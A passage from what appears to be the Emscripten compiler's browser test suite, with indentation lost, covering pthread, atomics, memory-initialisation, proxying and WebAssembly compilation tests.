SDL_Init(SDL_INIT_VIDEO);
SDL_SetVideoMode(600, 600, 16, SDL_OPENGL);
return (const char *)glGetString(GL_EXTENSIONS);
}
''')
run_process([PYTHON, EMCC, 'side.cpp', '-s', 'SIDE_MODULE=1', '-O2', '-o', 'side.wasm', '-lSDL', '-s', 'EXPORT_ALL=1'])
self.btest(self.in_dir('main.cpp'), '1', args=['-s', 'MAIN_MODULE=1', '-O2', '-s', 'LEGACY_GL_EMULATION=1', '-lSDL', '-lGL', '--pre-js', 'pre.js', '-s', 'EXPORT_ALL=1'])
def test_memory_growth_during_startup(self):
open('data.dat', 'w').write('X' * (30 * 1024 * 1024))
self.btest('browser_test_hello_world.c', '0', args=['-s', 'ASSERTIONS=1', '-s', 'ALLOW_MEMORY_GROWTH=1', '-s', 'TOTAL_MEMORY=16MB', '-s', 'TOTAL_STACK=5000', '--preload-file', 'data.dat'])
# pthreads tests
def prep_no_SAB(self):
open('html.html', 'w').write(open(path_from_root('src', 'shell_minimal.html')).read().replace('''<body>''', '''<body>
<script>
SharedArrayBuffer = undefined;
Atomics = undefined;
</script>
'''))
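# Usage sketch (illustrative, not an actual test here): a pthreads test can exercise the
# no-SharedArrayBuffer fallback path by compiling against the shell that prep_no_SAB()
# writes, e.g.:
#   self.prep_no_SAB()
#   self.btest(..., args=['-s', 'USE_PTHREADS=1', '--shell-file', 'html.html'])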
# Test that the emscripten_ atomics api functions work.
@requires_threads
def test_pthread_atomics(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_atomics.cpp'), expected='0', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'])
# Test 64-bit atomics.
@requires_threads
def test_pthread_64bit_atomics(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_64bit_atomics.cpp'), expected='0', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'])
# Test 64-bit C++11 atomics.
@requires_threads
def test_pthread_64bit_cxx11_atomics(self):
for opt in [['-O0'], ['-O3']]:
for pthreads in [[], ['-s', 'USE_PTHREADS=1']]:
self.btest(path_from_root('tests', 'pthread', 'test_pthread_64bit_cxx11_atomics.cpp'), expected='0', args=opt + pthreads + ['-std=c++11'])
# Test the old GCC atomic __sync_fetch_and_op builtin operations.
@requires_threads
def test_pthread_gcc_atomic_fetch_and_op(self):
# We need to resort to using regexes to optimize out SharedArrayBuffer when pthreads are not supported, which is brittle!
# Therefore perform very extensive testing of different codegen modes to catch any problems.
for opt in [[], ['-O1'], ['-O2'], ['-O3'], ['-O3', '-s', 'AGGRESSIVE_VARIABLE_ELIMINATION=1'], ['-Os'], ['-Oz']]:
for debug in [[], ['-g1'], ['-g2'], ['-g4']]:
for f32 in [[], ['-s', 'PRECISE_F32=1', '--separate-asm', '-s', 'WASM=0']]:
print(opt, debug, f32)
self.btest(path_from_root('tests', 'pthread', 'test_pthread_gcc_atomic_fetch_and_op.cpp'), expected='0', args=opt + debug + f32 + ['-s', 'TOTAL_MEMORY=64MB', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'])
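# Sketch (illustrative only): the nested opt/debug/f32 loops above enumerate a full cross
# product of codegen modes. itertools.product expresses the same matrix more flatly; the
# generator below just yields the combined emcc argument lists it would produce.
def pthread_codegen_matrix():
  import itertools
  opt_levels = [[], ['-O1'], ['-O2'], ['-O3'], ['-O3', '-s', 'AGGRESSIVE_VARIABLE_ELIMINATION=1'], ['-Os'], ['-Oz']]
  debug_levels = [[], ['-g1'], ['-g2'], ['-g4']]
  f32_modes = [[], ['-s', 'PRECISE_F32=1', '--separate-asm', '-s', 'WASM=0']]
  for opt, debug, f32 in itertools.product(opt_levels, debug_levels, f32_modes):
    yield opt + debug + f32 + ['-s', 'TOTAL_MEMORY=64MB', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8']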
# 64 bit version of the above test.
@requires_threads
def test_pthread_gcc_64bit_atomic_fetch_and_op(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_gcc_64bit_atomic_fetch_and_op.cpp'), expected='0', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'], also_asmjs=True)
# Test the old GCC atomic __sync_op_and_fetch builtin operations.
@requires_threads
def test_pthread_gcc_atomic_op_and_fetch(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_gcc_atomic_op_and_fetch.cpp'), expected='0', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'], also_asmjs=True)
# 64 bit version of the above test.
@requires_threads
def test_pthread_gcc_64bit_atomic_op_and_fetch(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_gcc_64bit_atomic_op_and_fetch.cpp'), expected='0', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'], also_asmjs=True)
# Tests the remaining GCC atomics not covered by the two tests above.
@requires_threads
def test_pthread_gcc_atomics(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_gcc_atomics.cpp'), expected='0', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'])
# Test the __sync_lock_test_and_set and __sync_lock_release primitives.
@requires_threads
def test_pthread_gcc_spinlock(self):
for arg in [[], ['-DUSE_EMSCRIPTEN_INTRINSICS']]:
self.btest(path_from_root('tests', 'pthread', 'test_pthread_gcc_spinlock.cpp'), expected='800', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'] + arg, also_asmjs=True)
# Test that basic thread creation works.
@requires_threads
def test_pthread_create(self):
for opt in [['-O0'], ['-O3']]:
print(str(opt))
self.btest(path_from_root('tests', 'pthread', 'test_pthread_create.cpp'), expected='0', args=opt + ['-s', 'TOTAL_MEMORY=64MB', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'])
# Tests the -s PROXY_TO_PTHREAD=1 option.
@requires_threads
def test_pthread_proxy_to_pthread(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_proxy_to_pthread.c'), expected='1', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1'], timeout=30)
# Test that a pthread can spawn another pthread of its own.
@requires_threads
def test_pthread_create_pthread(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_create_pthread.cpp'), expected='1', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=2'])
# Test another case of pthreads spawning pthreads, but this time the callers immediately join on the threads they created.
@requires_threads
def test_pthread_nested_spawns(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_nested_spawns.cpp'), expected='1', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=2'])
# Test that main thread can wait for a pthread to finish via pthread_join().
@requires_threads
def test_pthread_join(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_join.cpp'), expected='6765', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'])
# Test pthread_cancel() operation
@requires_threads
def test_pthread_cancel(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_cancel.cpp'), expected='1', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'])
# Test pthread_kill() operation
@no_chrome('pthread_kill hangs the chrome renderer, and keeps subsequent tests from passing')
@requires_threads
def test_pthread_kill(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_kill.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'])
# Test that pthread cleanup stack (pthread_cleanup_push/_pop) works.
@requires_threads
def test_pthread_cleanup(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_cleanup.cpp'), expected='907640832', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'])
# Tests the pthread mutex api.
@requires_threads
def test_pthread_mutex(self):
for arg in [[], ['-DSPINLOCK_TEST']]:
self.btest(path_from_root('tests', 'pthread', 'test_pthread_mutex.cpp'), expected='50', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'] + arg)
# Test that memory allocation is thread-safe.
@requires_threads
def test_pthread_malloc(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_malloc.cpp'), expected='0', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'])
# Stress test pthreads allocating memory that will call sbrk(), with the main thread having to free up the data.
@requires_threads
def test_pthread_malloc_free(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_malloc_free.cpp'), expected='0', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8', '-s', 'TOTAL_MEMORY=256MB'])
# Test that the pthread_barrier API works ok.
@requires_threads
def test_pthread_barrier(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_barrier.cpp'), expected='0', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'])
# Test the pthread_once() function.
@requires_threads
def test_pthread_once(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_once.cpp'), expected='0', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'])
# Test against a thread exit-time handling bug by spawning a large number of threads.
@requires_threads
def test_pthread_spawns(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_spawns.cpp'), expected='0', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'])
# It is common for code to flip volatile global vars for thread control. This is a bit lax, but nevertheless, test that this
# kind of scheme works with Emscripten as well.
@requires_threads
def test_pthread_volatile(self):
for arg in [[], ['-DUSE_C_VOLATILE']]:
self.btest(path_from_root('tests', 'pthread', 'test_pthread_volatile.cpp'), expected='1', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'] + arg)
# Test thread-specific data (TLS).
@requires_threads
def test_pthread_thread_local_storage(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_thread_local_storage.cpp'), expected='0', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'])
# Test the pthread condition variable creation and waiting.
@requires_threads
def test_pthread_condition_variable(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_condition_variable.cpp'), expected='0', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8'])
# Test that pthreads are able to do printf.
@requires_threads
def test_pthread_printf(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_printf.cpp'), expected='0', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=1'])
# Test that pthreads are able to do cout. Failed due to https://bugzilla.mozilla.org/show_bug.cgi?id=1154858.
@requires_threads
def test_pthread_iostream(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_iostream.cpp'), expected='0', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=1'])
# Test that the main thread is able to use pthread_set/getspecific.
@requires_threads
def test_pthread_setspecific_mainthread(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_setspecific_mainthread.cpp'), expected='0', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1'], also_asmjs=True)
# Test the -s PTHREAD_HINT_NUM_CORES=x command line variable.
@requires_threads
def test_pthread_num_logical_cores(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_num_logical_cores.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_HINT_NUM_CORES=2'], also_asmjs=True)
# Test that pthreads have access to filesystem.
@requires_threads
def test_pthread_file_io(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_file_io.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=1'])
# Test that the pthread_create() function operates benignly in the case that threading is not supported.
@requires_threads
def test_pthread_supported(self):
for args in [[], ['-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8']]:
self.btest(path_from_root('tests', 'pthread', 'test_pthread_supported.cpp'), expected='0', args=['-O3'] + args)
# Test that --separate-asm works with -s USE_PTHREADS=1.
@requires_threads
def test_pthread_separate_asm_pthreads(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_atomics.cpp'), expected='0', args=['-s', 'TOTAL_MEMORY=64MB', '-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8', '--separate-asm', '--profiling'])
# Test customizing the location from which pthread-main.js is loaded, via Module.locateFile
@requires_threads
def test_pthread_custom_pthread_main_url(self):
self.clear()
os.makedirs(os.path.join(self.get_dir(), 'cdn'))
open(os.path.join(self.get_dir(), 'main.cpp'), 'w').write(self.with_report_result(r'''
#include <stdio.h>
#include <string.h>
#include <emscripten/emscripten.h>
#include <emscripten/threading.h>
#include <pthread.h>
int result = 0;
void *thread_main(void *arg) {
emscripten_atomic_store_u32(&result, 1);
pthread_exit(0);
}
int main() {
pthread_t t;
if (emscripten_has_threading_support()) {
pthread_create(&t, 0, thread_main, 0);
pthread_join(t, 0);
} else {
result = 1;
}
REPORT_RESULT(result);
}
'''))
# Test that it is possible to define a "Module.locateFile" callback (receiving path and prefix) to control where pthread-main.js is loaded from.
open(self.in_dir('shell.html'), 'w').write(open(path_from_root('src', 'shell.html')).read().replace('var Module = {', 'var Module = { locateFile: function (path, prefix) {if (path.endsWith(".wasm")) {return prefix + path;} else {return "cdn/" + path;}}, '))
run_process([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp'), '--shell-file', 'shell.html', '-s', 'WASM=0', '-s', 'IN_TEST_HARNESS=1', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=1', '-o', 'test.html'])
shutil.move('pthread-main.js', os.path.join('cdn', 'pthread-main.js'))
self.run_browser('test.html', '', '/report_result?1')
# Test that it is possible to define "Module.locateFile(foo)" function to locate where pthread-main.js will be loaded from.
open(self.in_dir('shell2.html'), 'w').write(open(path_from_root('src', 'shell.html')).read().replace('var Module = {', 'var Module = { locateFile: function(filename) { if (filename == "pthread-main.js") return "cdn/pthread-main.js"; else return filename; }, '))
run_process([PYTHON, EMCC, os.path.join(self.get_dir(), 'main.cpp'), '--shell-file', 'shell2.html', '-s', 'WASM=0', '-s', 'IN_TEST_HARNESS=1', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=1', '-o', 'test2.html'])
try_delete('pthread-main.js')
self.run_browser('test2.html', '', '/report_result?1')
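# A minimal standalone sketch of the injection pattern used above: both shell
# variants rely on src/shell.html containing the literal text "var Module = {",
# so a plain str.replace() suffices to prepend configuration fields.
_shell = "<script>var Module = {};</script>"
_patched = _shell.replace("var Module = {", "var Module = { locateFile: function(p) { return 'cdn/' + p; },")
assert "cdn/" in _patched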
# Test that if the main thread performs a futex wait while a pthread needs it to execute a proxied operation (before that pthread would wake the main thread), the two do not deadlock.
@requires_threads
def test_pthread_proxying_in_futex_wait(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_proxying_in_futex_wait.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=1'])
# Test that sbrk() operates properly in multithreaded conditions
@requires_threads
def test_pthread_sbrk(self):
for aborting_malloc in [0, 1]:
print('aborting malloc=' + str(aborting_malloc))
# With aborting malloc = 1, test allocating memory in threads
# With aborting malloc = 0, allocate so much memory in threads that some of the allocations fail.
self.btest(path_from_root('tests', 'pthread', 'test_pthread_sbrk.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=8', '--separate-asm', '-s', 'ABORTING_MALLOC=' + str(aborting_malloc), '-DABORTING_MALLOC=' + str(aborting_malloc), '-s', 'TOTAL_MEMORY=128MB'])
# Test that -s ABORTING_MALLOC=0 works in both pthreads and non-pthreads builds. (sbrk fails gracefully)
@requires_threads
def test_pthread_gauge_available_memory(self):
for opts in [[], ['-O2']]:
for args in [[], ['-s', 'USE_PTHREADS=1']]:
self.btest(path_from_root('tests', 'gauge_available_memory.cpp'), expected='1', args=['-s', 'ABORTING_MALLOC=0'] + args + opts)
# Test that the proxying operations of user code from pthreads to main thread work
@requires_threads
def test_pthread_run_on_main_thread(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_run_on_main_thread.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=1'])
# Test how a lot of back-to-back called proxying operations behave.
@requires_threads
def test_pthread_run_on_main_thread_flood(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_run_on_main_thread_flood.cpp'), expected='0', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=1'])
# Test that it is possible to synchronously call a JavaScript function on the main thread and get a return value back.
@requires_threads
def test_pthread_call_sync_on_main_thread(self):
self.btest(path_from_root('tests', 'pthread', 'call_sync_on_main_thread.c'), expected='1', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1', '-DPROXY_TO_PTHREAD=1', '--js-library', path_from_root('tests', 'pthread', 'call_sync_on_main_thread.js')])
self.btest(path_from_root('tests', 'pthread', 'call_sync_on_main_thread.c'), expected='1', args=['-O3', '-s', 'USE_PTHREADS=1', '-DPROXY_TO_PTHREAD=0', '--js-library', path_from_root('tests', 'pthread', 'call_sync_on_main_thread.js')])
self.btest(path_from_root('tests', 'pthread', 'call_sync_on_main_thread.c'), expected='1', args=['-Oz', '-DPROXY_TO_PTHREAD=0', '--js-library', path_from_root('tests', 'pthread', 'call_sync_on_main_thread.js')])
# Test that it is possible to asynchronously call a JavaScript function on the main thread.
@requires_threads
def test_pthread_call_async_on_main_thread(self):
self.btest(path_from_root('tests', 'pthread', 'call_async_on_main_thread.c'), expected='7', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1', '-DPROXY_TO_PTHREAD=1', '--js-library', path_from_root('tests', 'pthread', 'call_async_on_main_thread.js')])
self.btest(path_from_root('tests', 'pthread', 'call_async_on_main_thread.c'), expected='7', args=['-O3', '-s', 'USE_PTHREADS=1', '-DPROXY_TO_PTHREAD=0', '--js-library', path_from_root('tests', 'pthread', 'call_async_on_main_thread.js')])
self.btest(path_from_root('tests', 'pthread', 'call_async_on_main_thread.c'), expected='7', args=['-Oz', '-DPROXY_TO_PTHREAD=0', '--js-library', path_from_root('tests', 'pthread', 'call_async_on_main_thread.js')])
# Tests that spawning a new thread does not cause a reinitialization of the global data section of the application memory area.
@requires_threads
def test_pthread_global_data_initialization(self):
for mem_init_mode in [[], ['--memory-init-file', '0'], ['--memory-init-file', '1'], ['-s', 'MEM_INIT_METHOD=2', '-s', 'WASM=0']]:
for args in [[], ['-O3']]:
self.btest(path_from_root('tests', 'pthread', 'test_pthread_global_data_initialization.c'), expected='20', args=args + mem_init_mode + ['-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1', '-s', 'PTHREAD_POOL_SIZE=1'])
@requires_threads
@requires_sync_compilation
def test_pthread_global_data_initialization_in_sync_compilation_mode(self):
for mem_init_mode in [[], ['--memory-init-file', '0'], ['--memory-init-file', '1'], ['-s', 'MEM_INIT_METHOD=2', '-s', 'WASM=0']]:
args = ['-s', 'BINARYEN_ASYNC_COMPILATION=0']
self.btest(path_from_root('tests', 'pthread', 'test_pthread_global_data_initialization.c'), expected='20', args=args + mem_init_mode + ['-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1', '-s', 'PTHREAD_POOL_SIZE=1'])
# Test that emscripten_get_now() reports coherent wallclock times across all pthreads, instead of each pthread independently reporting wallclock times since the launch of that pthread.
@requires_threads
def test_pthread_clock_drift(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_clock_drift.cpp'), expected='1', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1'])
@requires_threads
def test_pthread_utf8_funcs(self):
self.btest(path_from_root('tests', 'pthread', 'test_pthread_utf8_funcs.cpp'), expected='0', args=['-s', 'USE_PTHREADS=1', '-s', 'PTHREAD_POOL_SIZE=1'])
# Tests MAIN_THREAD_EM_ASM_INT() function call signatures.
@no_wasm_backend('MAIN_THREAD_EM_ASM() not yet implemented in Wasm backend')
def test_main_thread_em_asm_signatures(self):
self.btest(path_from_root('tests', 'core', 'test_em_asm_signatures.cpp'), expected='121', args=[])
@no_wasm_backend('MAIN_THREAD_EM_ASM() not yet implemented in Wasm backend')
@requires_threads
def test_main_thread_em_asm_signatures_pthreads(self):
self.btest(path_from_root('tests', 'core', 'test_em_asm_signatures.cpp'), expected='121', args=['-O3', '-s', 'USE_PTHREADS=1', '-s', 'PROXY_TO_PTHREAD=1'])
# test atomicrmw i64
@requires_threads
def test_atomicrmw_i64(self):
# TODO: enable this with wasm, currently pthreads/atomics have limitations
run_process([PYTHON, EMCC, path_from_root('tests', 'atomicrmw_i64.ll'), '-s', 'USE_PTHREADS=1', '-s', 'IN_TEST_HARNESS=1', '-o', 'test.html', '-s', 'WASM=0'])
self.run_browser('test.html', None, '/report_result?0')
# Test that it is possible to send a signal by calling alarm(timeout), which in turn invokes the signal handler registered with signal(SIGALRM, func).
def test_sigalrm(self):
self.btest(path_from_root('tests', 'sigalrm.cpp'), expected='0', args=['-O3'], timeout=30)
def test_meminit_pairs(self):
d = 'const char *data[] = {\n "'
d += '",\n "'.join(''.join('\\x{:02x}\\x{:02x}'.format(i, j)
for j in range(256)) for i in range(256))
with open(path_from_root('tests', 'meminit_pairs.c')) as f:
d += '"\n};\n' + f.read()
args = ["-O2", "--memory-init-file", "0", "-s", "MEM_INIT_METHOD=2", "-s", "ASSERTIONS=1", '-s', 'WASM=0']
self.btest(d, expected='0', args=args + ["--closure", "0"])
self.btest(d, expected='0', args=args + ["--closure", "0", "-g"])
self.btest(d, expected='0', args=args + ["--closure", "1"])
def test_meminit_big(self):
d = 'const char *data[] = {\n "'
d += '",\n "'.join([''.join('\\x{:02x}\\x{:02x}'.format(i, j)
for j in range(256)) for i in range(256)] * 256)
with open(path_from_root('tests', 'meminit_pairs.c')) as f:
d += '"\n};\n' + f.read()
assert len(d) > (1 << 27) # more than 32M memory initializer
args = ["-O2", "--memory-init-file", "0", "-s", "MEM_INIT_METHOD=2", "-s", "ASSERTIONS=1", '-s', 'WASM=0']
self.btest(d, expected='0', args=args + ["--closure", "0"])
self.btest(d, expected='0', args=args + ["--closure", "0", "-g"])
self.btest(d, expected='0', args=args + ["--closure", "1"])
def test_canvas_style_proxy(self):
self.btest('canvas_style_proxy.c', expected='1', args=['--proxy-to-worker', '--shell-file', path_from_root('tests/canvas_style_proxy_shell.html'), '--pre-js', path_from_root('tests/canvas_style_proxy_pre.js')])
def test_canvas_size_proxy(self):
self.btest(path_from_root('tests', 'canvas_size_proxy.c'), expected='0', args=['--proxy-to-worker'])
def test_custom_messages_proxy(self):
self.btest(path_from_root('tests', 'custom_messages_proxy.c'), expected='1', args=['--proxy-to-worker', '--shell-file', path_from_root('tests', 'custom_messages_proxy_shell.html'), '--post-js', path_from_root('tests', 'custom_messages_proxy_postjs.js')])
def test_separate_asm(self):
for opts in [['-O0'], ['-O1'], ['-O2'], ['-O2', '--closure', '1']]:
print(opts)
open('src.cpp', 'w').write(self.with_report_result(open(path_from_root('tests', 'browser_test_hello_world.c')).read()))
run_process([PYTHON, EMCC, 'src.cpp', '-o', 'test.html', '-s', 'WASM=0'] + opts)
self.run_browser('test.html', None, '/report_result?0')
print('run one')
open('one.html', 'w').write('<script src="test.js"></script>')
self.run_browser('one.html', None, '/report_result?0')
print('run two')
run_process([PYTHON, path_from_root('tools', 'separate_asm.py'), 'test.js', 'asm.js', 'rest.js'])
open('two.html', 'w').write('''
<script>
var Module = {};
</script>
<script src="asm.js"></script>
<script src="rest.js"></script>
''')
self.run_browser('two.html', None, '/report_result?0')
print('run hello world')
self.clear()
assert not os.path.exists('test.asm.js')
self.btest('browser_test_hello_world.c', expected='0', args=opts + ['-s', 'WASM=0', '--separate-asm'])
assert os.path.exists('test.asm.js')
os.unlink('test.asm.js')
print('see a fail')
self.run_browser('test.html', None, '[no http server activity]', timeout=5) # fail without the asm
def test_emterpretify_file(self):
open('shell.html', 'w').write('''
<!--
{{{ SCRIPT }}} // ignore this, we do it ourselves
-->
<script>
var Module = {};
var xhr = new XMLHttpRequest();
xhr.open('GET', 'code.dat', true);
xhr.responseType = 'arraybuffer';
xhr.onload = function() {
Module.emterpreterFile = xhr.response;
var script = document.createElement('script');
script.src = "test.js";
document.body.appendChild(script);
};
xhr.send(null);
</script>
''')
try_delete('code.dat')
self.btest('browser_test_hello_world.c', expected='0', args=['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_FILE="code.dat"', '-O2', '-g', '--shell-file', 'shell.html', '-s', 'ASSERTIONS=1'])
assert os.path.exists('code.dat')
try_delete('code.dat')
self.btest('browser_test_hello_world.c', expected='0', args=['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_FILE="code.dat"', '-O2', '-g', '-s', 'ASSERTIONS=1'])
assert os.path.exists('code.dat')
def test_vanilla_html_when_proxying(self):
for opts in [0, 1, 2]:
print(opts)
open('src.cpp', 'w').write(self.with_report_result(open(path_from_root('tests', 'browser_test_hello_world.c')).read()))
run_process([PYTHON, EMCC, 'src.cpp', '-o', 'test.js', '-O' + str(opts), '--proxy-to-worker'])
open('test.html', 'w').write('<script src="test.js"></script>')
self.run_browser('test.html', None, '/report_result?0')
def test_in_flight_memfile_request(self):
# test the XHR for an asm.js mem init file being in flight already
for o in [0, 1, 2]:
print(o)
opts = ['-O' + str(o), '-s', 'WASM=0']
print('plain html')
open('src.cpp', 'w').write(self.with_report_result(open(path_from_root('tests', 'in_flight_memfile_request.c')).read()))
run_process([PYTHON, EMCC, 'src.cpp', '-o', 'test.js'] + opts)
open('test.html', 'w').write('<script src="test.js"></script>')
self.run_browser('test.html', None, '/report_result?0') # never when we provide our own HTML like this.
print('default html')
self.btest('in_flight_memfile_request.c', expected='0' if o < 2 else '1', args=opts) # should happen when there is a mem init file (-O2+)
def test_binaryen_interpreter(self):
self.btest('browser_test_hello_world.c', expected='0', args=['-s', 'BINARYEN=1', '-s', 'BINARYEN_METHOD="interpret-binary"'])
self.btest('browser_test_hello_world.c', expected='0', args=['-s', 'BINARYEN=1', '-s', 'BINARYEN_METHOD="interpret-binary"', '-O2'])
@requires_sync_compilation
def test_binaryen_async(self):
# notice when we use async compilation
script = '''
<script>
// note if we do async compilation
var real_wasm_instantiate = WebAssembly.instantiate;
var real_wasm_instantiateStreaming = WebAssembly.instantiateStreaming;
if (typeof real_wasm_instantiateStreaming === 'function') {
WebAssembly.instantiateStreaming = function(a, b) {
Module.sawAsyncCompilation = true;
return real_wasm_instantiateStreaming(a, b);
};
} else {
WebAssembly.instantiate = function(a, b) {
Module.sawAsyncCompilation = true;
return real_wasm_instantiate(a, b);
};
}
// show stderr for the viewer's fun
err = function(x) {
out('<<< ' + x + ' >>>');
console.log(x);
};
</script>
{{{ SCRIPT }}}
'''
shell_with_script('shell.html', 'shell.html', script)
common_args = ['--shell-file', 'shell.html']
for opts, expect in [
([], 1),
(['-O1'], 1),
(['-O2'], 1),
(['-O3'], 1),
(['-s', 'BINARYEN_ASYNC_COMPILATION=1'], 1), # force it on
(['-O1', '-s', 'BINARYEN_ASYNC_COMPILATION=0'], 0), # force it off
(['-s', 'BINARYEN_ASYNC_COMPILATION=1', '-s', 'BINARYEN_METHOD="interpret-binary"'], 0), # try to force it on, but have it disabled
]:
print(opts, expect)
self.btest('binaryen_async.c', expected=str(expect), args=common_args + opts)
# Ensure that compilation still works and is async without instantiateStreaming available
no_streaming = ' <script> WebAssembly.instantiateStreaming = undefined;</script>'
shell_with_script('shell.html', 'shell.html', no_streaming + script)
self.btest('binaryen_async.c', expected='1', args=common_args)
# Test that implementing Module.instantiateWasm() callback works.
def test_manual_wasm_instantiate(self):
src = os.path.join(self.get_dir(), 'src.cpp')
open(src, 'w').write(self.with_report_result(open(os.path.join(path_from_root('tests/manual_wasm_instantiate.cpp'))).read()))
run_process([PYTHON, EMCC, 'src.cpp', '-o', 'manual_wasm_instantiate.js', '-s', 'BINARYEN=1'])
shutil.copyfile(path_from_root('tests', 'manual_wasm_instantiate.html'), os.path.join(self.get_dir(), 'manual_wasm_instantiate.html'))
self.run_browser('manual_wasm_instantiate.html', 'wasm instantiation succeeded', '/report_result?1')
def test_binaryen_worker(self):
